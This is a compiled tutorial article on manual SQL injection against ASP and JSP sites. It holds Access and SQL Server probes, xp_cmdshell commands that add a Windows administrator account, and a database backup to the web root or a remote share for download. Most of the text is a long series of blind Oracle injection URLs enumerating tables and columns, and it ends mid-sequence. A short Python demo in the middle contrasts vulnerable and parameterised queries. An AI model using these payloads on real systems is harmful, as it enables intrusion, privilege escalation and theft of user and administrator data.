
Learning manual ASP script injection

2023-05-09 08:51:05

Submitted to this site by "huigok", who collected 8 pieces on learning manual ASP script injection; below is the editor's compilation of them.


Part 1: Learning manual ASP script injection

Manual injection technique against ASP scripts:

ACCESS

Determine the database type

www.zengke.com/product.asp?sort_id=24 and exists (select * from sysobjects)

Check whether the table admin exists: a normally rendered page means it exists, an error page means it does not.

www.zengke.com//product.asp?sort_id=24 and exists (select * from admin)

Check whether the column admin_name exists in the table admin

/product.asp?sort_id=24 and exists (select admin_name from admin)

Determine the length of the pwd value in the table admin: the page errors when the guessed bound is less than the real length and renders normally when it equals it (the request below tests "at most 7").

www.zengke.com//product.asp?sort_id=24 And (Select Top 1 len(cstr([pwd])) From (Select Top 1 * From [admin] Where 1=1 order by [pwd]) T order by [pwd] desc)<=7

Brute-force the admin_name value in the table admin (no request is given for this step).

SQL Server

①Site/url.asp?id=1;exec master..xp_cmdshell "net user name password /add"--

In SQL Server the semicolon separates two statements and -- turns the rest of the line into a comment, so this is executed as two statements: first the SELECT of the record with ID=1, then the stored procedure xp_cmdshell, which runs operating-system commands. The net command therefore creates a Windows account with user name name and password password. Next:

②Site/url.asp?id=1;exec master..xp_cmdshell "net localgroup administrators name /add"--

This adds the new account name to the Administrators group; in under two minutes you hold the highest privilege on the system. Of course, this only works when the application connects to the database as sa; otherwise there is no permission to call xp_cmdshell.

③Site/url.asp?id=1 ;;and db_name()>0

An earlier example, and user>0, retrieves the name of the connected user; db_name() is another system function, returning the name of the connected database.

④Site/url.asp?id=1;backup database <database name> to disk='c:\inetpub\wwwroot\<file>.db';--

This is a particularly nasty one: take the database name obtained in ③ and an absolute path leaked by some IIS error message, back the database up into the web directory, then download the entire database over HTTP, and every administrator and user password is exposed. When the absolute path is unknown, the backup can also be written to a network location (such as \\202.96.xx.xx\Share\<file>.db), though this rarely succeeds.

⑤Site/url.asp?id=1 ;;and (Select Top 1 name from sysobjects where xtype='U' and status>0)>0

As noted before, sysobjects is a SQL Server system table holding every table name, view, constraint and other object; xtype='U' and status>0 selects the user-created tables. The statement above takes the first table name and compares it with 0, so that the error message discloses the name. How to obtain the second and third table names is left to our clever readers.

⑥Site/url.asp?id=1 ;;and (Select Top 1 col_name(object_id('<table name>'),1) from sysobjects)>0

With a table name from ⑤, object_id('<table name>') returns the table's internal ID and col_name(<table ID>,1) is the name of its first column; replacing 1 with 2, 3, 4 ... enumerates the columns of the guessed table one by one.
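Both the Access probes (exists(select ...), the pwd length bound) and the SQL Server stacked statements above depend on one precondition: the application pastes the request parameter straight into its SQL text, so the attacker gets a "normal page / empty page / error page" oracle. The Python example below is an addition by the editor, not code from the article or from the site it describes. It reproduces that oracle against a constructed in-memory SQLite database (the tables product and admin, the column pwd and the value 'secret1' are assumed), rewrites the Access length probe in SQLite syntax because SQLite has no TOP or cstr(), and puts a validating, parameterised lookup beside the vulnerable one to show that the oracle disappears once the value is bound as data.

```python
import sqlite3

# Constructed stand-in schema (not the page's real site): a product lookup
# plus an admin table with a 7-character password. All names are assumed.
SCHEMA = """
CREATE TABLE product (sort_id INTEGER, name TEXT);
CREATE TABLE admin (admin_name TEXT, pwd TEXT);
INSERT INTO product VALUES (24, 'widget');
INSERT INTO admin VALUES ('admin', 'secret1');
"""


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, raw_param):
    # Assumed shape of the page's product.asp: the query-string value is
    # concatenated straight into the statement, so it is parsed as SQL.
    sql = "SELECT name FROM product WHERE sort_id=" + raw_param
    return [row[0] for row in conn.execute(sql)]


def probe(conn, raw_param):
    """Collapse the response into the three states the article distinguishes:
    'normal' (rows rendered), 'empty' (no rows) or 'error' (SQL failed)."""
    try:
        rows = vulnerable_lookup(conn, raw_param)
    except sqlite3.Error:
        return "error"
    return "normal" if rows else "empty"


def safe_lookup(conn, raw_param):
    # Validate the shape first, then bind it; the value travels as data and
    # is never re-parsed as part of the statement.
    if not raw_param.isdigit():
        raise ValueError("sort_id must be a non-negative integer")
    sql = "SELECT name FROM product WHERE sort_id=?"
    return [row[0] for row in conn.execute(sql, (int(raw_param),))]


def safe_probe(conn, raw_param):
    """Same three-state view of the hardened lookup, plus 'rejected'."""
    try:
        rows = safe_lookup(conn, raw_param)
    except ValueError:
        return "rejected"
    return "normal" if rows else "empty"


# The article's probes, with the Access TOP/len(cstr()) length test rewritten
# in SQLite syntax (same question: is the password at most 7 characters?).
PROBES = [
    "24",
    "24 and exists (select * from sysobjects)",    # no such table -> error
    "24 and exists (select * from admin)",         # table exists -> normal
    "24 and exists (select admin_name from admin)",
    "24 and (select length(pwd) from admin)<=7",   # bound holds -> normal
    "24 and (select length(pwd) from admin)<=6",   # bound too small -> empty
]

if __name__ == "__main__":
    db = new_db()
    for p in PROBES:
        print(f"{p!r:50} vulnerable={probe(db, p):7} hardened={safe_probe(db, p)}")
```

Run it and the vulnerable column walks through exactly the normal/error/empty answers the article reads off the web page, while the hardened column answers "rejected" to every non-numeric value; on a real application the same effect comes from binding parameters in ADO or JDBC and from connecting with an account that cannot reach sysobjects, master or xp_cmdshell at all.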

Part 2: Learning manual injection against JSP scripts (script security)

1. Determine the injection type (numeric or string)

Distinguishing string and numeric parameters (someone may want to refine this further, splitting it into separate numeric and string tests):

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0) And 1=1

www.test.net/index_kaoyan_view.jsp?id=117 And user<>char(0) And %25=

www.test.net/index_kaoyan_view.jsp?id=117 And user<>char(0) And ( )=(

www.test.net/index_kaoyan_view.jsp?id=117) And user<char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97) And 1=1

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<>str(97) And %25=

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<>str(97) And ( )=(

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)<str(97)

Requests that return a normal page:

www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)

www.test.net/index_kaoyan_view.jsp?id=117 And USER<CHR(0)

2. Determine the number of tables and the table names

The table count is 3 digits long:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

Next, determining the number of tables digit by digit:

First digit of the table count: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

Second digit of the table count: 3

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

Third digit of the table count: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

There are 131 tables in total, see the figure above.

Next, determining the table names:

Determining the length of the first table's name: 2

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

Determining the first character of the first table's name: A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

Determining the second character of the first table, AD: D

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

Determining the length of the second table's name, ADER: 4

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

Determining the first character of the second table, ADER: A

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

Determining the second character of the second table, ADER: D

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

Determining the third character of the second table, ADER: E

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

Determining the fourth character of the second table, ADER: R

www.test.net/index_kaoyan_view.jsp?id=117 And 69=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 80>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 85>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 82=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),4,1))

Determining the length of the third table's name:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=3)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

3. Determine the number of columns and the column names:

a) The column count of table AD (CHR(65)||CHR(68)) is 2 digits long:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68))),0)

Column count: 10 or more

First digit of the column count: 1 (tens)

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),1,1))

Second digit of the column count: 0 (units)

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT(*)FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68)),2,1))

